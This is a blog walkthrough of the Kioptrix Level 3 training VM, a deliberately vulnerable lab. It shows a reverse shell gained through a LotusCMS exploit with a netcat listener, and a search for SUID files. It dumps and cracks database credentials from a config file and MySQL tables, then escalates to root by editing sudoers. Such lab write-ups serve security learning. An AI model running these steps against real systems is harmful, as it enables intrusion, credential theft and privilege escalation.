Monday, November 4, 2013

Kioptrix Level 3 - Walkthrough

It's definitely getting more difficult. Let's see. The NMAP scan showed the following:

root@kali:~# nmap -sS -A

Starting Nmap 6.40 ( ) at 2013-11-03 22:04 CET
Nmap scan report for
Host is up (0.00062s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:17:F3:43 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.62 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

I went to the website, and after some navigation I found that it's running Lotus CMS web application.

I found two exploits on exploit-db, one of them was for Metasploit, which I didn't wanted to use (although I tried the exploit and it worked), and the other didn't work. I found another one, which is a bash script of the Metasploit version:

It worked really nice, and I got a reverse shell:

About to try and inject reverse shell....
what IP to use?
What PORT?

OK, open your local listener and choose the method for back connect:
1) NetCat -e        3) NetCat Backpipe    5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1


root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 59701
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd

I tried quite a few local privilege escalation exploits but neither of them worked.

I did some further enumeration and found that there is an interesting file which has the suid bit set (/usr/local/bin/ht).

$ find / -perm -u=s -type f 2>/dev/null     
find / -perm -u=s -type f 2>/dev/null

However I couldn't run it from here, cause I didn't have full terminal access. I need SSH! Argh...

I moved on to do some further enumeration. In the passwd file I found 2 other normal users (beside root):

dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

I looked on the webapp configs hoping I will find a password for the MySQL database on the system. I found it in the gconfig.php file:

www-data@Kioptrix3:/home/www/$ cat gconfig.php
cat gconfig.php
        A sample Gallarific configuration file. You should edit
        the installer details below and save this file as gconfig.php
        Do not modify anything else if you don't know what it is.

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

    // Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
        echo("A connection to the database couldn't be established: " . mysql_error());
}else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
    }else {
        $settings=mysql_query("select * from gallarific_settings");


I logged in to the database and after browsing the tables, I found passwords for the two users on the machine.

mysql> select * from gallarific_users
select * from gallarific_users
    -> ;
| userid | username | password | usertype  | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
|      1 | admin    | n0t7t1k4 | superuser | Super     | User     |       | 1302628616 |         |           1 |       |          |
1 row in set (0.01 sec)

mysql> select * from dev_accounts
select * from dev_accounts
    -> ;
| id | username   | password                         |
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
2 rows in set (0.00 sec)


After doing a Google search I found the password for the MD5 hashes:

md5(Mast3r) = 0d3eccfb887aabd50f243b3f155c0f85
md5(starwars) = 5badcaf789d3d1d09794d8f021f40f0e

It turned out that both passwords were working on SSH as well. The better account was "loneferret". After login I found that it can run "ht" editor with root privileges.

I could open the shadow file:

But it takes lot of time to find the password for root. I could open the sudoers file:

This is a very poor editor, works only in hex, so the simpliest was to modify the line:

loneferret ALL=NOPASSWD:  !/usr/bin/su, /usr/local/bin/ht
loneferret ALL=NOPASSWD:      /bin/su, /usr/local/bin/ht 

That means that I can run the "su" command as well, w/o password.

After saving I could run "sudo su", and I got root access.

No comments: